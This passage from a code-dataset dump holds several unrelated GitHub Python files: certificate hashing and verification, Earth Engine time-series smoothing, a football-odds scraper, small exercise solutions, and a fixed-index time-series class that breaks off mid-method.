status.status != CertificateStatus.VALID:\n            raise Exception(f\"certificate is not valid (status={status.status})\")\n\n    @staticmethod\n    def _certificate_signature_state(state, cert: Certificate, include_signature: bool) -> None:\n        \"\"\"Collect signature state over a certificate.\"\"\"\n\n        for s in cert.subjects:\n            crypto_sign_ed25519ph_update(state, s.encode(\"UTF-8\"))\n        crypto_sign_ed25519ph_update(state, struct.pack(\">Q\", cert.valid_from))\n        crypto_sign_ed25519ph_update(state, struct.pack(\">I\", cert.valid_length))\n        for u in cert.usages:\n            if u == CertificateUsage.CERTIFICATE_SIGNING:\n                crypto_sign_ed25519ph_update(state, bytes([0]))\n            elif u == CertificateUsage.CLIENT_AUTHENTICATION:\n                crypto_sign_ed25519ph_update(state, bytes([1]))\n            elif u == CertificateUsage.SERVER_AUTHENTICATION:\n                crypto_sign_ed25519ph_update(state, bytes([2]))\n            elif u == CertificateUsage.STATUS_SIGNING:\n                crypto_sign_ed25519ph_update(state, bytes([3]))\n            else:\n                raise Exception(f\"invalid certificate usage {u}\")\n        crypto_sign_ed25519ph_update(state, cert.encryption_public_key)\n        crypto_sign_ed25519ph_update(state, cert.signing_public_key)\n\n        if cert.HasField(\"issuer\"):\n            crypto_sign_ed25519ph_update(state, cert.issuer.value)\n            if cert.issuer.algorithm == HashAlgorithm.SHA256:\n                crypto_sign_ed25519ph_update(state, bytes([1]))\n            elif cert.issuer.algorithm == HashAlgorithm.SHA512:\n                crypto_sign_ed25519ph_update(state, bytes([2]))\n            else:\n                raise Exception(f\"unsupported hash algorithm {cert.issuer.algorithm}\")\n\n            if include_signature:\n                crypto_sign_ed25519ph_update(state, cert.issuer_signature)\n\n    @staticmethod\n    def _status_signature_state(state, status: CertificateStatusResponse) -> None:\n        \"\"\"Collect signature state over a status.\"\"\"\n\n        CertificateVerifier._certificate_hash_signature_state(state, status.certificate)\n        if status.status == CertificateStatus.UNKNOWN:\n            crypto_sign_ed25519ph_update(state, bytes([0]))\n        elif status.status == CertificateStatus.VALID:\n            crypto_sign_ed25519ph_update(state, bytes([1]))\n        elif status.status == CertificateStatus.INVALID:\n            crypto_sign_ed25519ph_update(state, bytes([2]))\n        else:\n            raise Exception(f\"invalid certificate status {status.status}\")\n\n        crypto_sign_ed25519ph_update(state, struct.pack(\">Q\", status.valid_from))\n        crypto_sign_ed25519ph_update(state, struct.pack(\">I\", status.valid_length))\n\n        CertificateVerifier._certificate_signature_state(state, status.status_certificate, True)\n\n    @staticmethod\n    def _certificate_hash_signature_state(state, cert: CertificateHash) -> None:\n        \"\"\"Collect signature state over a certificate hash.\"\"\"\n\n        crypto_sign_ed25519ph_update(state, cert.value)\n        if cert.algorithm == HashAlgorithm.SHA256:\n            crypto_sign_ed25519ph_update(state, bytes([1]))\n        elif cert.algorithm == HashAlgorithm.SHA512:\n            crypto_sign_ed25519ph_update(state, bytes([2]))\n        else:\n            raise Exception(f\"unsupported hash algorithm {cert.algorithm}\")\n\n\ndef hash_certificate(cert: Certificate, h, a: HashAlgorithm) -> CertificateHash:\n    \"\"\"Hash a certificate using the given hash object and algorithm.\"\"\"\n\n    for s in cert.subjects:\n        h.update(s.encode(\"UTF-8\"))\n    h.update(struct.pack(\">Q\", cert.valid_from))\n    h.update(struct.pack(\">I\", cert.valid_length))\n    for u in cert.usages:\n        if u == CertificateUsage.CERTIFICATE_SIGNING:\n            h.update(bytes([0]))\n        elif u == CertificateUsage.CLIENT_AUTHENTICATION:\n            h.update(bytes([1]))\n        elif u == CertificateUsage.SERVER_AUTHENTICATION:\n            h.update(bytes([2]))\n        elif u == CertificateUsage.STATUS_SIGNING:\n            
h.update(bytes([3]))\n else:\n raise Exception(f\"unknown certificate usage {u}\")\n h.update(cert.encryption_public_key)\n h.update(cert.signing_public_key)\n\n if cert.HasField(\"issuer\"):\n h.update(cert.issuer.value)\n if cert.issuer.algorithm == HashAlgorithm.SHA256:\n h.update(bytes([1]))\n elif cert.issuer.algorithm == HashAlgorithm.SHA512:\n h.update(bytes([2]))\n else:\n raise Exception(f\"unsupported hash algorithm {cert.issuer.algorithm}\")\n\n h.update(cert.issuer_signature)\n\n x = CertificateHash()\n x.value = h.digest()\n x.algorithm = a\n return x\n","repo_name":"aayushkubitkar/NSTP-Content-Security","sub_path":"nstp/pki.py","file_name":"pki.py","file_ext":"py","file_size_in_byte":10312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74576654519","text":"title = ''' Kiểm tra 2 list có phần tử chung hay không.'''\n\nmy_crush = [1, 'Taiwan', 'Student', 'Beauty', 'Talent']\nme = [0, 'VietNam', 'Student']\n\nprint(f'BT7:{title}\\n')\nprint('Input:')\nprint(f'\\t\\tMy Cush = {my_crush}')\nprint(f'\\t\\tMe = {me}')\nsame = []\n\nfor i in my_crush:\n for j in me:\n if i in same:\n break\n elif i == j:\n same.append(i)\n\nprint('--------------')\nprint(f'Output: {same}')\n\n","repo_name":"nmnhat211/python-core","sub_path":"off_general_exercises/off_exer4/exer7.py","file_name":"exer7.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72838704761","text":"# library to apply whittaker smoothing to a image collection having images with\n# continous data\n#\n# function takes image collection [type ee.ImageCollection],\n# whether data is compositional [type boolean] (optional, default false)\n# and lambda [type integer] (optional, default 5)\n# images in collection must have property 'system:time_start'\n#\n# returns a corresponding image collection with temporally smoothened images\n# and a rmse images which has pixelwise rmse for each band\n#\n# published functions are 'whittakerSmoothing'\n#\n# --------------------------------------------------------------------\n# Managing Imports\nfrom utils import *\nimport ee\nee.Initialize()\n\n# Function to compute the inverse log ratio of a regression results to\n# transform back to percent units\ndef inverseLogRatio(image):\n bands = image.bandNames()\n ilrImage = ee.Image(100).divide(ee.Image(1).add(image.exp())).rename(bands)\n return ilrImage\n\ndef whittakerSmoothing(imageCollection, isCompositional = False, lamb = 5):\n # quick configs to set defaults\n def toFl(image):\n return image.toFloat()\n\n # procedure start\n ic = imageCollection.map(toFl)\n\n dimension = ic.size()\n identity_mat = ee.Array.identity(dimension)\n difference_mat = getDifferenceMatrix(identity_mat,3)\n difference_mat_transpose = difference_mat.transpose()\n lamda_difference_mat = difference_mat_transpose.multiply(lamb)\n res_mat = lamda_difference_mat.matrixMultiply(difference_mat)\n hat_matrix = res_mat.add(identity_mat)\n\n # backing up original data\n original = ic\n\n def getProperties(image):\n return ee.Image(image).toDictionary()\n\n # get original image properties\n properties = ic.toList(10000).map(getProperties)\n\n\n # if data is compositional\n # calculate the logratio of an image between 0 and 100. 
First\n # clamps between delta and 100-delta, where delta is a small positive value.\n if (isCompositional):\n\n def clampImage(image):\n delta = 0.001\n bands = image.bandNames()\n image = image.clamp(delta,100-delta)\n image = (ee.Image.constant(100).subtract(image)).divide(image).log().rename(bands)\n return image\n\n ic = ic.map(clampImage)\n\n arrayImage = original.toArray()\n coeffimage = ee.Image(hat_matrix).updateMask(arrayImage.mask())\n smoothImage = coeffimage.matrixSolve(arrayImage.unmask(hat_matrix.multiply(0)))\n\n def getImageId(image):\n return ee.Image(image).id()\n\n idlist = ic.toList(10000).map(getImageId)\n\n bandlist = ee.Image(ic.first()).bandNames()\n\n flatImage = smoothImage.arrayFlatten([idlist,bandlist])\n smoothCollection = ee.ImageCollection(unpack(flatImage, idlist, bandlist))\n\n if (isCompositional):\n smoothCollection = smoothCollection.map(inverseLogRatio)\n\n def addSuffix(band):\n return ee.String(band).cat('_fitted')\n\n # get new band names by adding suffix fitted\n newBandNames = bandlist.map(addSuffix)\n\n # rename the bands in smoothened images\n smoothCollection = smoothCollection.select(bandlist, newBandNames)\n\n # a really dumb way to loose the google earth engine generated ID so that the two\n # images can be combined for the chart\n dumbimg = arrayImage.arrayFlatten([idlist,bandlist])\n dumbcoll = ee.ImageCollection(unpack(dumbimg,idlist, bandlist))\n outCollection = dumbcoll.combine(smoothCollection)\n\n outCollList = outCollection.toList(10000)\n def addPropBack(image):\n return ee.Image(image).set(properties.get(outCollList.indexOf(image)))\n\n outCollectionProp = outCollList.map(addPropBack)\n\n residue_sq = smoothImage.subtract(arrayImage).pow(ee.Image(2)).divide(dimension)\n rmse_array = residue_sq.arrayReduce(ee.Reducer.sum(),[0]).pow(ee.Image(1/2))\n\n rmseImage = rmse_array.arrayFlatten([[\"rmse\"],bandlist])\n\n return (ee.ImageCollection(outCollectionProp), rmseImage)\n # return ee.ImageCollection.fromImages(outCollectionProp)\n\n# --------------------------------------------------------------------\n# Author: Nishanta Khanal\n# Organization: ICIMOD\n# Contact: nkhanal@icimod.org\n# --------------------------------------------------------------------\n","repo_name":"banmedo/RLCMS_test","sub_path":"Smoothing/WhittakerSmoothing.py","file_name":"WhittakerSmoothing.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2954207431","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom typing import *\nimport requests\nimport time\nimport os\nimport json\nimport datetime\n\nimport config\n\n\nchampionships: Dict[str, str] = {\n \"seriea\": \"https://www.diretta.it/serie-a/\",\n \"bundesliga\": \"https://www.diretta.it/calcio/germania/bundesliga/\",\n \"premierleague\": \"https://www.diretta.it/calcio/inghilterra/premier-league/\",\n \"ligue1\": \"https://www.diretta.it/calcio/francia/ligue-1/\",\n \"eredivisie\": \"https://www.diretta.it/calcio/olanda/eredivisie/\",\n \"laliga\": \"https://www.diretta.it/calcio/spagna/primera-division/\"\n}\n\n\nclass Match:\n def __init__(self, match_id, date, time, home_team, away_team, odd1, oddX, odd2):\n self.match_id = match_id\n self.date = date\n self.time = time\n self.home_team = home_team\n self.away_team = away_team\n self.odd1 = odd1\n self.oddX = oddX\n self.odd2 = odd2\n\n def __str__(self):\n return f\"{self.home_team} - {self.away_team} ({self.date} 
{self.time})\"\n\n def __repr__(self):\n return self.__str__()\n\n\ndef get_soup(url, driver: webdriver.Firefox = None):\n # get the html\n if driver is None:\n browser = get_driver(config.browser)\n else:\n browser = driver\n browser.get(url)\n html = browser.page_source\n # return the soup\n return BeautifulSoup(html, 'html.parser')\n\n\ndef get_matches(soup, target_round: int = None, driver: webdriver.Firefox = None) -> List[Match]:\n # get the matches\n round: int = 0\n matches = []\n\n page = soup.find(\"div\", class_='sportName')\n for child in page.find_all(\"div\"):\n if child.attrs['class'][0] == 'event__round':\n round = int(child.text.split(\" \")[1])\n if target_round is None:\n target_round = round\n elif target_round == round:\n if child.attrs['class'][0] == 'event__match':\n match_id = child.attrs['id'][4:]\n odd1, oddX, odd2 = get_odds(match_id, driver=driver)\n time = child.find(\"div\", class_='event__time').text\n date, time = time.split(\" \")\n home_team = child.find(\n \"div\", class_='event__participant event__participant--home').text\n away_team = child.find(\n \"div\", class_='event__participant event__participant--away').text\n matches.append(\n Match(match_id, date, time, home_team, away_team, odd1, oddX, odd2))\n # return the matches\n return matches, target_round\n\n\ndef get_odds(match_id: str, driver: webdriver.Firefox = None) -> Tuple[float, float, float]:\n # get the html\n url = f\"https://www.diretta.it/partita/{match_id}\"\n total1, totalX, total2 = 0, 0, 0\n count1, countX, count2 = 0, 0, 0\n if driver is None:\n browser = get_driver(config.browser)\n else:\n browser = driver\n browser.get(url)\n time.sleep(2)\n html = browser.page_source\n # return the soup\n soup = BeautifulSoup(html, 'html.parser')\n # get the odds\n rows = soup.find_all(\"div\", class_='oddsRowContent')\n for row in rows:\n try:\n odds1 = float(row.find(\"span\", class_='cell o_1').text[1:])\n oddsx = float(row.find(\"span\", class_='cell o_0').text[1:])\n odds2 = float(row.find(\"span\", class_='cell o_2').text[1:])\n total1 += odds1\n totalX += oddsx\n total2 += odds2\n count1 += 1\n countX += 1\n count2 += 1\n except:\n pass\n try:\n return round(total1 / count1, 2), round(totalX / countX, 2), round(total2 / count2, 2)\n except:\n return 0, 0, 0\n\n\ndef matches_to_csv(matches: List[Match], filename: str):\n with open(filename, 'w') as f:\n f.write(\"id,date,time,home_team,away_team,1,X,2\\n\")\n for match in matches:\n f.write(\n f\"{match.match_id},{match.date},{match.time},{match.home_team},{match.away_team},{match.odd1},{match.oddX},{match.odd2}\\n\")\n\n\ndef matches_to_json(matches: List[Match], filename: str):\n with open(filename, 'w') as f:\n f.write(\"{\\n\")\n for i, match in enumerate(matches):\n f.write(f\"\\\"{match.match_id}\\\": {{\\n\")\n f.write(f\"\\\"date\\\": \\\"{match.date}\\\",\\n\")\n f.write(f\"\\\"time\\\": \\\"{match.time}\\\",\\n\")\n f.write(f\"\\\"home_team\\\": \\\"{match.home_team}\\\",\\n\")\n f.write(f\"\\\"away_team\\\": \\\"{match.away_team}\\\",\\n\")\n f.write(f\"\\\"homeodds\\\": {match.odd1},\\n\")\n f.write(f\"\\\"X\\\": {match.oddX},\\n\")\n f.write(f\"\\\"awayodds\\\": {match.odd2}\\n\")\n if i == len(matches) - 1:\n f.write(\"}\\n\")\n else:\n f.write(\"},\\n\")\n f.write(\"}\\n\")\n\n\ndef get_latest_round(championship: str, driver: webdriver.Firefox = None) -> int:\n soup = get_soup(f\"{championships[championship]}calendario/\", driver=driver)\n matches, round = get_matches(soup, driver=driver)\n matches_to_json(matches, 
f\"matches/{championship}.json\")\n\n\ndef do_scraping():\n #driver = webdriver.Firefox()\n driver = get_driver(config.browser)\n for championship in championships:\n get_latest_round(championship, driver=driver)\n driver.quit()\n\n\ndef getMatchResult(match_id: str, driver: webdriver.Firefox = None) -> str:\n '''\n Returns the result of the match with the given id.\n '''\n\n # open the results.json file to check if the match results was already scraped\n with open('matches/results.json', 'r') as f:\n results = json.load(f)\n\n # check if the match result was already scraped\n if match_id in results:\n return results[match_id], driver\n\n # else, scrape the result and save it in the results.json file\n\n # get the driver\n if driver is None:\n #driver = webdriver.Firefox()\n driver = get_driver(config.browser)\n url = f\"https://www.diretta.it/partita/{match_id}\"\n driver.get(url)\n time.sleep(1)\n html = driver.page_source\n soup = BeautifulSoup(html, 'html.parser')\n result = soup.find(\"div\", class_=\"detailScore__wrapper\").text\n # save the result in the results.json file, but only if the match is finished\n if result != \"-\":\n results[match_id] = result\n with open('matches/results.json', 'w') as f:\n json.dump(results, f)\n return result, driver\n\n\ndef checkBet(bet_filename: str, driver: webdriver.Firefox = None) -> int:\n '''\n Checks the bet with the given filename.\n Returns -1 if the bet is not finished yet, 0 if the bet is lost, and 1 if the bet is a winning one.\n '''\n # read the bet\n with open(bet_filename, 'r') as f:\n bet = json.load(f)\n\n # get the matches\n matches = {}\n result = 1\n for match in bet[\"bets\"]:\n match_id = match[\"match_id\"]\n day = match[\"day\"]\n month = match[\"month\"]\n hour = match[\"time\"]\n hour, minute = hour.split(\":\")\n hour, day, month = int(hour), int(day), int(month)\n # get today's date\n today = datetime.datetime.today()\n if today.month < month or (today.month == month and today.day < day) or (today.month == month and today.day == day and today.hour < hour + 2):\n matches[match_id] = \"-\"\n else:\n # get the match result (only if it has been played)\n matches[match_id], driver = getMatchResult(match_id, driver=driver)\n if matches[match_id] == \"-\" and result != 0: # the match is not finished yet\n result = -1\n elif matches[match_id] != \"-\":\n home_score, away_score = matches[match_id].split(\"-\")\n home_score, away_score = int(home_score), int(away_score)\n # this match is won\n if home_score > away_score and match[\"bet\"] == \"1\":\n continue\n # this match is won\n elif home_score == away_score and match[\"bet\"] == \"X\":\n continue\n # this match is won\n elif home_score < away_score and match[\"bet\"] == \"2\":\n continue\n else: # this match is lost\n result = 0\n # all the matches are won\n return result, driver\n\n\ndef getBetsResult(bet_blockchain: List[Tuple[str, str, str]]) -> None:\n '''\n Given a list of bets, checks the result of each bet and saves it in the bet json file.\n The list of bets is given as a list of tuples (hash, address of who made the bet, block number of the block that added the bet).\n '''\n # get the list of the bets on the server\n bet_files = os.listdir(config.BET_FOLDER)\n driver = None\n for hash, _, _ in bet_blockchain:\n # if the bet is on the server, scrape the result (if not already done)\n if hash+\".json\" in bet_files:\n # get the json of the bet\n with open(config.BET_FOLDER.joinpath(hash+\".json\"), \"r\") as f:\n bet_json = json.load(f)\n # get the result of the bet 
(if exists)\n        result = bet_json.get(\"result\")\n        # if the result is not already scraped, scrape it\n        result_scraped, driver = checkBet(\n            config.BET_FOLDER.joinpath(hash+\".json\"), driver=driver)\n        if result is None or (result != result_scraped and result == -1):\n            # save the result in the json file\n            bet_json[\"result\"] = result_scraped\n            with open(config.BET_FOLDER.joinpath(hash+\".json\"), \"w\") as f:\n                json.dump(bet_json, f)\n    if driver is not None:\n        driver.close()\n\n\ndef get_driver(browser: str):\n    if browser == \"firefox\":\n        return webdriver.Firefox()\n    elif browser == \"chrome\":\n        return webdriver.Chrome()\n","repo_name":"bonjon/DistributedBetting","sub_path":"py/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":9747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"42178560792","text":"from django.test import TestCase\n\n# Create your tests here.\nfrom .models import TaskModel\n\ndef print_task(task):\n    print(f'''[{task.id} - {task.name}] \nlist:({task.list.id} - {task.list.name})\npriority:({task.priority.id} - {task.priority.name})''')\n    \nprint(\"\\t### Tasks ###\")\n\n\ndef testino():\n\n    # get task with related models\n    task = TaskModel.objects\\\n        .select_related('priority')\\\n        .first()\n    # priority joined in the query\n    # list queried again\n    print_task(task)\n# testino()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nprint()","repo_name":"Akraminum/TodoApiProject-DRF","sub_path":"Tasks/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19120652663","text":"#! /usr/bin/env python\n\n\"\"\"This module lists constants that are used by the target coverage tool\n\"\"\"\n\nfrom matplotlib.path import Path\n\n# Matplotlib info\nCODES_ONE_SCA = [Path.MOVETO, Path.LINETO, Path.LINETO, Path.LINETO, Path.CLOSEPOLY]\n\n# List of instruments the tool supports\nSUPPORTED_INSTRUMENTS = ['nircam']\n\n# Reference apertures for plotting\nREFERENCE_APERTURES = {'nircam': 'NRCALL_FULL',\n                       'niriss': 'NIS_CEN'}\n","repo_name":"mrobberto/ARTIFACTS","sub_path":"APT_tools/target_coverage_tool/target_coverage_tool/utils/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22167621048","text":"import sys; input = sys.stdin.readline\r\n\r\ndef sum_binom(n, r, k):\r\n    ans = 0; f = 1\r\n    for i in range(r):\r\n        f *= n-i; f //= i+1; ans += f\r\n        if ans > k: break\r\n    return ans\r\n\r\nfor _ in range(int(input())):\r\n    n, k = map(int, input().split())\r\n    lo, hi = 0, n\r\n    while hi-lo > 1:\r\n        mid = (lo+hi)//2\r\n        if sum_binom(mid, k, n) < n: lo = mid\r\n        else: hi = mid\r\n    print('Impossible' if lo > 31 else lo+1)","repo_name":"RussellDash332/kattis","sub_path":"src/Power Eggs/powereggs.py","file_name":"powereggs.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"21414469623","text":"#\r\n# Date : 2018.12.06 thu\r\n# Author : 글로벌리더십학부 21800633 장은준\r\n# Purpose : merge sort implementation program.\r\n#\r\n\r\ndef mergeSort(list1, list2):\r\n    rlist = list1 + list2 # merge the two lists\r\n    rlist.sort() # sort\r\n\r\n    count = 0\r\n    i = 0\r\n    while i < len(rlist): # loop to drop duplicated values\r\n        j = i + 1\r\n        while j < len(rlist): # compared against the current element, a value that appears two or more times has to be removed.\r\n            if rlist[i] == rlist[j]:\r\n                
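# rlist[j] equals rlist[i]: count the duplicate; every occurrence after the second is popped below\r\n                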
count+=1\r\n                if count > 1:\r\n                    rlist.pop(j) # remove the duplicate\r\n                    j-=1\r\n            j+=1\r\n\r\n        count = 0\r\n        i+=1\r\n    \r\n    return rlist\r\n\r\n","repo_name":"SilverJun/PythonPractice","sub_path":"mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34676554201","text":"class Solution:\n    def twoSum(self, nums: List[int], target: int) -> List[int]:\n        \n        hashmap = {}\n        \n        for x, num in enumerate(nums):\n            diff = target - num\n            if diff in hashmap:\n                return [hashmap[diff], x]\n            else:\n                hashmap[num] = x\n        return False\n\n    #Complexity O(n)\n\n    #Bruteforce O(n^2)","repo_name":"kritanu/coding-solutions","sub_path":"arrays_and_strings/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9876344082","text":"import csv\nimport datetime\nfrom math import floor\nfrom os.path import basename\n\nimport pandas\nfrom numpy import nan, isnan\n\nfrom stldecompose import decompose\n\n\nclass FixedIndexTimeseries(object):\n    \"\"\"This class implements a wrapper for 5-day, decadal and monthly timeseries.\n\n    FixedIndex means that each year has the same number of periods and that every period takes the same position in\n    every year, e.g. months or semi-months etc. It does not work for timeseries with periods that strictly consist\n    of the same number of days and, as such, might overlap New Year. This class is based on pandas.Series objects.\n\n    The timeseries are indexed by the first day of a period, e.g. 2007/5/11 for the 2nd decade in May 2007.\n    The annual index is defined as the position of the period within the year, e.g. 5 for the 2nd decade in February.\n    Timeseries can be loaded from a csv file with the subclass FixedIndexTimeseriesCSV\n\n    Attributes:\n        timeseries: a pandas.Series object with data indexed by the first day of a period as datetime.date object.\n        label: an optional, custom label for the object.\n        mode: The frequency mode of the timeseries. Either p (5-day), d (decadal), m (monthly)\n        maxindex: the maximum value that annualindex can have for the mode\n    \"\"\"\n\n    def __init__(self, series, mode, label=None):\n        \"\"\"Initialises an instance of the FixedIndexTimeseries Class\n\n        Args:\n            series: A pandas.Series object, where the index is datetime.date objects.\n            mode: The frequency that series is expected to have, either: p (5-day), d (decadal), m (monthly)\n            label: An optional label for the timeseries. Default is None: uses the label that is found in the series object.\n\n        Returns:\n            An instance of FixedIndexTimeseries\n\n        Raises:\n            ValueError: When the argument given for mode is not recognized.\n            ModeError: when the mode given as argument and the property of series do not fit. 
The mismatch is only detected when the\n            series is of higher frequency than indicated by mode.\n        \"\"\"\n        self.mode = mode\n        self.yearswitch = False\n        if mode == 'd':\n            self.maxindex = 36\n            self.period = 10\n            self.periodname=\"decade\"\n        elif mode == \"p\":\n            self.maxindex = 72\n            self.period = 5\n            self.periodname=\"pentade\"\n        elif mode == \"m\":\n            self.maxindex = 12\n            self.period = 30\n            self.periodname=\"month\"\n        elif mode == \"dl\":\n            self.maxindex = 365\n            self.period = 1\n            self.periodname=\"daily\"\n        else:\n            try:\n                res = mode.split(\"-\")\n                self.yearswitch = False if int(res[1])>=int(res[0]) else True #does the season definition overlap new year?\n                self.begin = datetime.date(1,int(res[0]),1)\n                self.end = (datetime.date(1,int(res[1]),1) + datetime.timedelta(32)).replace(day=1) + datetime.timedelta(-1) #Ugly solution to get last day of the month\n                self.maxindex = 1\n                self.period = (self.end - self.begin).days\n                self.periodname = \"season\"\n            except:\n                raise ValueError(\"The given mode was not recognized. Check the docstring of the class for details.\")\n\n        if self.__check_timeseries(series):\n            self.timeseries = series.sort_index()\n        else:\n            raise self.__ModeError(\n                \"The given series can not be recognized as a timeseries with frequency mode %s\" % self.mode)\n\n        if label == None:\n            self.label = self.timeseries.name\n        else:\n            self.label = label\n\n        self.__mode_order = ['dl', 'p', 'd', 'm']\n\n    def __check_timeseries(self, series):\n        for i, item in series.iteritems():\n            date = self.firstday_of_period(i.year, self.convert_to_annual_index(i))\n            if not date == i:\n                return False\n        return True\n\n    def firstday_of_period(self, year, annual_index):\n        \"\"\"Returns the first day of a period given by the year and the annual index of the period\n\n        Decadal: first day of period (2007,3) --> datetime.date(2007,1,21)\n\n        Args:\n            year: The year\n            annual_index: The index of the period within a year. 0 < annual_index < maxindex (e.g. 5-day: 72)\n\n        Returns:\n            datetime.date(y,m,d) of the first day of the period described by the year and annual index.\n\n        Raises:\n            ValueError: When the annual index is invalid or outside the valid range defined by the mode\n        \"\"\"\n\n        if not 0 < annual_index < self.maxindex + 1 or not type(annual_index) == int:\n            raise ValueError(\"Annual index is not valid: 0 < index < %s for mode=%s\" % (self.maxindex + 1, self.mode))\n\n        if self.maxindex == 1:\n            return datetime.date(year, self.begin.month, self.begin.day)\n        elif self.maxindex == 365:\n            return datetime.date(year, 1, 1) + datetime.timedelta(annual_index - 1)\n        else:\n            month = int((annual_index - 1) / (float(self.maxindex) / 12)) + 1\n            day_start = int(((annual_index - 1) % (float(self.maxindex) / 12)) * self.period + 1)\n            return datetime.date(year, month, day_start)\n\n    def lastday_of_period(self, year, annual_index):\n        \"\"\"Returns the last day of a period given by the year and the annual index of the period\n\n        Decadal: last day of period (2007,3) --> datetime.date(2007,1,31)\n\n        Args:\n            year: The year\n            annual_index: The index of the period within a year. 0 < annual_index < maxindex (e.g. 
5-day: 72)\n\n        Returns:\n            datetime.date(y,m,d) of the last day of the period described by the year and annual index.\n\n        Raises:\n            ValueError: When the annual index is invalid or outside the valid range defined by the mode\n        \"\"\"\n\n        if not 0 < annual_index < self.maxindex + 1 or not type(annual_index) == int:\n            raise ValueError(\"Annual index is not valid: 0 < index < %s for mode=%s\" % (self.maxindex + 1, self.mode))\n\n        if self.maxindex == 1:\n            return datetime.date(year, self.end.month, self.end.day)\n        else:\n            annual_index = annual_index+1\n            if annual_index>self.maxindex:\n                annual_index = 1\n                year = year + 1\n            return self.firstday_of_period(year,annual_index)-datetime.timedelta(1)\n\n    @staticmethod\n    def doy(date):\n        return date.timetuple().tm_yday\n\n    def convert_to_annual_index(self, date):\n        \"\"\"Returns the annual_index of a datetime.date object\n\n        Decadal: datetime.date(2007,1,21) --> first day of period (2007,3)\n                 datetime.date(2007,1,30) --> first day of period (2007,3)\n                 datetime.date(2007,2,1) --> first day of period (2007,4)\n        Is the reverse function of firstday_of_period(year,annual_index)\n\n        Args:\n            date: A datetime.date object\n\n        Returns:\n            int: the annual index of the period that the datetime.date is a member of.\n\n        Raises:\n            None\n        \"\"\"\n        if self.maxindex == 1:\n            if self.doy(date) <= self.doy(self.end): #replaces: if self.doy(self.begin) <= self.doy(date) <= self.doy(self.end):\n                return 1\n            elif self.yearswitch:\n                return 1\n            else:\n                return 2\n        elif self.maxindex == 365:\n            return self.doy(date)\n        else:\n            return int((date.month - 1) * (float(self.maxindex) / 12)) + ((min(date.day,30) - 1) / self.period) + 1\n\n    def shift_date_by_period(self, date, shift):\n        \"\"\"Shifts a datetime.date object by the given number of periods.\n\n        E.g. decadal: Shifting datetime.date(2007,1,25)\n             by -3 gives datetime.date(2006,12,21)\n        Remark: The input date is first converted to the first day of the period it is a member of.\n\n        Args:\n            date: A datetime.date object\n            shift: An integer corresponding to the periods that the date should be shifted.\n                   Negative value: back in time. 
Positive value: forward in time\n\n Returns:\n datetime.date: the shifted date\n\n Raises:\n None\n \"\"\"\n newindex = self.convert_to_annual_index(date) + shift\n # Correcting for shifts between years:\n if newindex < 1:\n factor = int(floor((newindex - 1) / self.maxindex))\n return self.firstday_of_period(date.year + 1 * factor, newindex - self.maxindex * factor)\n elif newindex > self.maxindex:\n factor = int(floor((newindex - 1) / self.maxindex))\n return self.firstday_of_period(date.year + int(1 * factor), newindex - self.maxindex * factor)\n else:\n return self.firstday_of_period(date.year, newindex)\n\n def get_value(self, year, annualindex):\n \"\"\"Returns a value by year and annualindex\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n year (int): the year from which data is requested\n annualindex (int): the index from which data is requested\n\n Returns:\n a pandas Series object with a single value of the same format as the class attribute timeseries\n\n Raises:\n None\n \"\"\"\n date = self.firstday_of_period(year, annualindex)\n return self.timeseries.reindex([date])\n\n def data_by_index(self, annualindex):\n \"\"\"Returns all data in FixedIndexTimeseries by annualindex.\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n annualindex (int): the index from which data is requested\n\n Returns:\n a pandas Series object of the same format as the class attribute timeseries\n\n Raises:\n None\n \"\"\"\n\n indexrange = ([annualindex] if type(annualindex) == int else annualindex)\n\n if not all([(0 < i < self.maxindex+1) for i in indexrange]):\n raise ValueError(\"The provided annualindex is outside the range %s < annualindex < %s\" %(0,self.maxindex+1))\n out = []\n years = range(min(self.timeseries.index).year, max(self.timeseries.index).year + 1)\n\n for index in indexrange:\n dates = map(self.firstday_of_period, years, len(years) * [index])\n try:\n data = self.timeseries.reindex(dates).dropna()\n out.append(data)\n except:\n out.append([])\n if type(annualindex) == int:\n out = out[0]\n\n return out\n\n def data_by_year(self, year):\n \"\"\"Returns all data in FixedIndexTimeseries by year\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n year (int): the year from which data is requested\n\n Returns:\n a pandas Series object of the same format as the class attribute timeseries\n Raises:\n None\n \"\"\"\n\n out = list()\n for i in range(1,self.maxindex+1):\n date = self.firstday_of_period(year=year,annual_index=i)\n val = self.timeseries.reindex([date])\n out.append(val)\n return pandas.concat(out)\n\n def norm(self, annualindex=None):\n \"\"\"Given a FixedIndexTimeseries, returns the average (norm) value for each period of the year or the specified period\n\n Args:\n FixedIndexTimeseriesObj: a FixedIndexTimeseries instance\n annualindex: None (default), or the index or list of indexes of the period(s) for which the norm should be computed.\n Otherwise the norms for all periods are computed.\n\n Returns:\n A value or list of values describing the norm in the same order as argument annualindex\n\n Raises:\n None\n \"\"\"\n\n norm = []\n if annualindex:\n indexrange = ([annualindex] if type(annualindex) == int else 